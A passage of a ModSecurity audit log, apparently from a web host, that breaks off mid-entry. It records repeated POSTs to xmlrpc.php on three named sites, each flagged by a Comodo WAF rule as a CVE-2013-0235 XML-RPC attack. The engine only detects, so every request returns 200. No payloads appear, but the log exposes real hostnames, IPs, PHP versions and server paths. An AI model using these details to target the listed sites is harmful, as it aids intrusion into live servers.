"DETECTION_ONLY" --21954454-Z-- --241ff120-A-- [15/Jun/2025:22:50:50.067807 +0530] aE8A8RLQPChAjmM6-0i9ZQAAAAQ 183.56.195.106 41496 127.0.0.1 7081 --241ff120-B-- POST /xmlrpc.php HTTP/1.0 Host: www.rsda.in X-Real-IP: 183.56.195.106 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 220 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) Accept-Encoding: gzip,deflate --241ff120-F-- HTTP/1.1 200 OK X-Powered-By: PHP/7.4.33 Connection: close Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 206 Content-Type: text/xml; charset=UTF-8 --241ff120-H-- Message: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 183.56.195.106 (41+1 hits since last alert)|www.rsda.in|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 183.56.195.106 (41+1 hits since last alert)|www.rsda.in|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "www.rsda.in"] [uri "/xmlrpc.php"] [unique_id "aE8A8RLQPChAjmM6-0i9ZQAAAAQ"] Apache-Handler: proxy:unix:/var/www/vhosts/system/rsda.in/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1750008049781913 286005 (- - -) Stopwatch2: 1750008049781913 286005; combined=2177, p1=387, p2=1338, p3=86, p4=44, p5=195, sr=118, sw=127, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --241ff120-Z-- --3cb40602-A-- [15/Jun/2025:22:50:52.119548 +0530] aE8A82CPauOs0aEe3c0-3AAAAAI 124.109.12.110 41592 127.0.0.1 7081 --3cb40602-B-- POST /xmlrpc.php HTTP/1.0 Host: archangledesignstudio.com X-Real-IP: 124.109.12.110 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 685 Content-Type: text/xml; charset=utf-8 Accept: */* Accept-Language: en-FM,en-US;q=0.8,en;q=0.6,es-ES;q=0.4,es;q=0.2 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 --3cb40602-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.3.22 Connection: close Vary: Accept-Encoding,User-Agent Content-Type: text/xml; charset=UTF-8 --3cb40602-H-- Message: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 124.109.12.110 (0+1 hits since last alert)|archangledesignstudio.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 124.109.12.110 (0+1 hits since last alert)|archangledesignstudio.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "archangledesignstudio.com"] [uri "/xmlrpc.php"] [unique_id "aE8A82CPauOs0aEe3c0-3AAAAAI"] Apache-Handler: proxy:unix:/var/www/vhosts/system/archangledesignstudio.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1750008051794151 325460 (- - -) Stopwatch2: 1750008051794151 325460; combined=2455, p1=364, p2=1628, p3=81, p4=54, p5=198, sr=93, sw=130, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --3cb40602-Z-- --13dfe159-A-- [15/Jun/2025:22:51:08.137219 +0530] aE8BAztuDRGAAnNiXIek3AAAAAg 128.199.112.101 53172 127.0.0.1 7081 --13dfe159-B-- POST //xmlrpc.php HTTP/1.0 Host: best-website-designs.com X-Real-IP: 128.199.112.101 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 494 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Content-Type: application/xml --13dfe159-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.3.22 Connection: close Vary: Accept-Encoding Content-Type: text/xml; charset=UTF-8 --13dfe159-H-- Message: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 128.199.112.101 (50+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 128.199.112.101 (50+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "best-website-designs.com"] [uri "/xmlrpc.php"] [unique_id "aE8BAztuDRGAAnNiXIek3AAAAAg"] Apache-Handler: proxy:unix:/var/www/vhosts/system/best-website-designs.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1750008067154712 982574 (- - -) Stopwatch2: 1750008067154712 982574; combined=2297, p1=352, p2=1556, p3=44, p4=65, p5=175, sr=95, sw=105, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --13dfe159-Z-- --9d74312b-A-- [15/Jun/2025:22:51:49.301475 +0530] aE8BLTtuDRGAAnNiXIek8gAAAAg 183.56.195.106 44858 127.0.0.1 7081 --9d74312b-B-- POST /xmlrpc.php HTTP/1.0 Host: www.rsda.in X-Real-IP: 183.56.195.106 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 224 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) Accept-Encoding: gzip,deflate --9d74312b-F-- HTTP/1.1 200 OK X-Powered-By: PHP/7.4.33 Connection: close Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 206 Content-Type: text/xml; charset=UTF-8 --9d74312b-H-- Message: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 183.56.195.106 (61+1 hits since last alert)|www.rsda.in|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 183.56.195.106 (61+1 hits since last alert)|www.rsda.in|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "www.rsda.in"] [uri "/xmlrpc.php"] [unique_id "aE8BLTtuDRGAAnNiXIek8gAAAAg"] Apache-Handler: proxy:unix:/var/www/vhosts/system/rsda.in/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1750008109016971 284567 (- - -) Stopwatch2: 1750008109016971 284567; combined=2258, p1=364, p2=1500, p3=70, p4=39, p5=178, sr=112, sw=107, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --9d74312b-Z-- --8631d531-A-- [15/Jun/2025:22:51:51.448578 +0530] aE8BLztuDRGAAnNiXIek8wAAAAg 124.109.12.110 46880 127.0.0.1 7081 --8631d531-B-- POST /xmlrpc.php HTTP/1.0 Host: archangledesignstudio.com X-Real-IP: 124.109.12.110 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 686 Content-Type: text/xml; charset=utf-8 Accept: */* Accept-Language: en-FM,en-US;q=0.8,en;q=0.6,es-ES;q=0.4,es;q=0.2 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 --8631d531-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.3.22 Connection: close Vary: Accept-Encoding,User-Agent Content-Type: text/xml; charset=UTF-8 --8631d531-H-- Message: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 124.109.12.110 (0+1 hits since last alert)|archangledesignstudio.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 124.109.12.110 (0+1 hits since last alert)|archangledesignstudio.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "archangledesignstudio.com"] [uri "/xmlrpc.php"] [unique_id "aE8BLztuDRGAAnNiXIek8wAAAAg"] Apache-Handler: proxy:unix:/var/www/vhosts/system/archangledesignstudio.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1750008111144031 304639 (- - -) Stopwatch2: 1750008111144031 304639; combined=2952, p1=540, p2=1867, p3=94, p4=55, p5=234, sr=183, sw=162, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --8631d531-Z-- --f50d3c29-A-- [15/Jun/2025:22:52:08.307822 +0530] aE8BPwZ37L8e68IeSGnubwAAAAo 128.199.112.101 49258 127.0.0.1 7081 --f50d3c29-B-- POST //xmlrpc.php HTTP/1.0 Host: best-website-designs.com X-Real-IP: 128.199.112.101 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 502 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Content-Type: application/xml --f50d3c29-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.3.22 Connection: close Vary: Accept-Encoding Content-Type: text/xml; charset=UTF-8 --f50d3c29-H-- Message: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 128.199.112.101 (50+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 128.199.112.101 (50+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "best-website-designs.com"] [uri "/xmlrpc.php"] [unique_id "aE8BPwZ37L8e68IeSGnubwAAAAo"] Apache-Handler: proxy:unix:/var/www/vhosts/system/best-website-designs.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1750008127423074 884818 (- - -) Stopwatch2: 1750008127423074 884818; combined=2210, p1=358, p2=1318, p3=52, p4=70, p5=250, sr=96, sw=162, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --f50d3c29-Z-- --d2b3fa61-A-- [15/Jun/2025:22:52:49.540342 +0530] aE8Bab59833JshVCMq_gNwAAAAY 183.56.195.106 38530 127.0.0.1 7081 --d2b3fa61-B-- POST /xmlrpc.php HTTP/1.0 Host: www.rsda.in X-Real-IP: 183.56.195.106 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 219 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) Accept-Encoding: gzip,deflate --d2b3fa61-F-- HTTP/1.1 200 OK X-Powered-By: PHP/7.4.33 Connection: close Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 206 Content-Type: text/xml; charset=UTF-8 --d2b3fa61-H-- Message: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 183.56.195.106 (45+1 hits since last alert)|www.rsda.in|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 183.56.195.106 (45+1 hits since last alert)|www.rsda.in|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "www.rsda.in"] [uri "/xmlrpc.php"] [unique_id "aE8Bab59833JshVCMq_gNwAAAAY"] Apache-Handler: proxy:unix:/var/www/vhosts/system/rsda.in/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1750008169257231 283182 (- - -) Stopwatch2: 1750008169257231 283182; combined=2155, p1=459, p2=1314, p3=71, p4=39, p5=169, sr=100, sw=103, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --d2b3fa61-Z-- --b529e43a-A-- [15/Jun/2025:22:53:08.796730 +0530] aE8Be2CPauOs0aEe3c0_IAAAAAI 128.199.112.101 42760 127.0.0.1 7081 --b529e43a-B-- POST //xmlrpc.php HTTP/1.0 Host: best-website-designs.com X-Real-IP: 128.199.112.101 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 497 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Content-Type: application/xml --b529e43a-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.3.22 Connection: close Vary: Accept-Encoding Content-Type: text/xml; charset=UTF-8 --b529e43a-H-- Message: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 128.199.112.101 (50+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 128.199.112.101 (50+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "best-website-designs.com"] [uri "/xmlrpc.php"] [unique_id "aE8Be2CPauOs0aEe3c0_IAAAAAI"] Apache-Handler: proxy:unix:/var/www/vhosts/system/best-website-designs.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1750008187858018 938768 (- - -) Stopwatch2: 1750008187858018 938768; combined=2659, p1=481, p2=1761, p3=43, p4=96, p5=172, sr=137, sw=106, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --b529e43a-Z-- --c96f0414-A-- [15/Jun/2025:22:53:49.461994 +0530] aE8BpV-LYq7Bs5L9UHpaaAAAAAM 124.109.12.110 53644 127.0.0.1 7081 --c96f0414-B-- POST /xmlrpc.php HTTP/1.0 Host: archangledesignstudio.com X-Real-IP: 124.109.12.110 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 684 Content-Type: text/xml; charset=utf-8 Accept: */* Accept-Language: en-FM,en-US;q=0.8,en;q=0.6,es-ES;q=0.4,es;q=0.2 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 --c96f0414-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.3.22 Connection: close Vary: Accept-Encoding,User-Agent Content-Type: text/xml; charset=UTF-8 --c96f0414-H-- Message: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 124.109.12.110 (1+1 hits since last alert)|archangledesignstudio.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 124.109.12.110 (1+1 hits since last alert)|archangledesignstudio.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "archangledesignstudio.com"] [uri "/xmlrpc.php"] [unique_id "aE8BpV-LYq7Bs5L9UHpaaAAAAAM"] Apache-Handler: proxy:unix:/var/www/vhosts/system/archangledesignstudio.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1750008229161963 300098 (- - -) Stopwatch2: 1750008229161963 300098; combined=2367, p1=408, p2=1587, p3=59, p4=48, p5=166, sr=102, sw=99, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --c96f0414-Z-- --91eae860-A-- [15/Jun/2025:22:53:49.555082 +0530] aE8BpTtuDRGAAnNiXIelLwAAAAg 183.56.195.106 53648 127.0.0.1 7081 --91eae860-B-- POST /xmlrpc.php HTTP/1.0 Host: www.rsda.in X-Real-IP: 183.56.195.106 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 218 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) Accept-Encoding: gzip,deflate --91eae860-F-- HTTP/1.1 200 OK X-Powered-By: PHP/7.4.33 Connection: close Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 206 Content-Type: text/xml; charset=UTF-8 --91eae860-H-- Message: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 183.56.195.106 (59+1 hits since last alert)|www.rsda.in|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 183.56.195.106 (59+1 hits since last alert)|www.rsda.in|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "www.rsda.in"] [uri "/xmlrpc.php"] [unique_id "aE8BpTtuDRGAAnNiXIelLwAAAAg"] Apache-Handler: proxy:unix:/var/www/vhosts/system/rsda.in/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1750008229254532 300612 (- - -) Stopwatch2: 1750008229254532 300612; combined=2578, p1=337, p2=1855, p3=69, p4=38, p5=171, sr=92, sw=108, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --91eae860-Z-- --d4c15830-A-- [15/Jun/2025:22:54:08.731634 +0530] aE8BtztuDRGAAnNiXIelNgAAAAg 128.199.112.101 43338 127.0.0.1 7081 --d4c15830-B-- POST //xmlrpc.php HTTP/1.0 Host: best-website-designs.com X-Real-IP: 128.199.112.101 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 486 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Content-Type: application/xml --d4c15830-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.3.22 Connection: close Vary: Accept-Encoding Content-Type: text/xml; charset=UTF-8 --d4c15830-H-- Message: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 128.199.112.101 (50+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 128.199.112.101 (50+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "best-website-designs.com"] [uri "/xmlrpc.php"] [unique_id "aE8BtztuDRGAAnNiXIelNgAAAAg"] Apache-Handler: proxy:unix:/var/www/vhosts/system/best-website-designs.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1750008247669103 1062587 (- - -) Stopwatch2: 1750008247669103 1062587; combined=2590, p1=555, p2=1630, p3=42, p4=65, p5=183, sr=229, sw=115, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --d4c15830-Z-- --8ac73b0f-A-- [15/Jun/2025:22:54:49.721469 +0530] aE8B4TtuDRGAAnNiXIelSwAAAAg 124.109.12.110 44148 127.0.0.1 7081 --8ac73b0f-B-- POST /xmlrpc.php HTTP/1.0 Host: archangledesignstudio.com X-Real-IP: 124.109.12.110 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 682 Content-Type: text/xml; charset=utf-8 Accept: */* Accept-Language: en-FM,en-US;q=0.8,en;q=0.6,es-ES;q=0.4,es;q=0.2 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 --8ac73b0f-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.3.22 Connection: close Vary: Accept-Encoding,User-Agent Content-Type: text/xml; charset=UTF-8 --8ac73b0f-H-- Message: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 124.109.12.110 (0+1 hits since last alert)|archangledesignstudio.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 124.109.12.110 (0+1 hits since last alert)|archangledesignstudio.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "archangledesignstudio.com"] [uri "/xmlrpc.php"] [unique_id "aE8B4TtuDRGAAnNiXIelSwAAAAg"] Apache-Handler: proxy:unix:/var/www/vhosts/system/archangledesignstudio.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1750008289416240 305304 (- - -) Stopwatch2: 1750008289416240 305304; combined=2166, p1=371, p2=1360, p3=68, p4=70, p5=184, sr=90, sw=113, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --8ac73b0f-Z-- --029cd40a-A-- [15/Jun/2025:22:54:49.927154 +0530] aE8B4V-LYq7Bs5L9UHpahAAAAAM 183.56.195.106 44178 127.0.0.1 7081 --029cd40a-B-- POST /xmlrpc.php HTTP/1.0 Host: www.rsda.in X-Real-IP: 183.56.195.106 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 221 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) Accept-Encoding: gzip,deflate --029cd40a-F-- HTTP/1.1 200 OK X-Powered-By: PHP/7.4.33 Connection: close Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 206 Content-Type: text/xml; charset=UTF-8 --029cd40a-H-- Message: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 183.56.195.106 (44+1 hits since last alert)|www.rsda.in|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 183.56.195.106 (44+1 hits since last alert)|www.rsda.in|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "www.rsda.in"] [uri "/xmlrpc.php"] [unique_id "aE8B4V-LYq7Bs5L9UHpahAAAAAM"] Apache-Handler: proxy:unix:/var/www/vhosts/system/rsda.in/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1750008289643775 283442 (- - -) Stopwatch2: 1750008289643775 283442; combined=2109, p1=376, p2=1284, p3=93, p4=53, p5=186, sr=107, sw=117, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --029cd40a-Z-- --a3f47172-A-- [15/Jun/2025:22:55:07.969443 +0530] aE8B80mAj8yxyFrMChh0IgAAAAE 128.199.112.101 57234 127.0.0.1 7081 --a3f47172-B-- POST //xmlrpc.php HTTP/1.0 Host: best-website-designs.com X-Real-IP: 128.199.112.101 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 492 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Content-Type: application/xml --a3f47172-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.3.22 Connection: close Vary: Accept-Encoding Content-Type: text/xml; charset=UTF-8 --a3f47172-H-- Message: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 128.199.112.101 (49+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 128.199.112.101 (49+1 hits since last 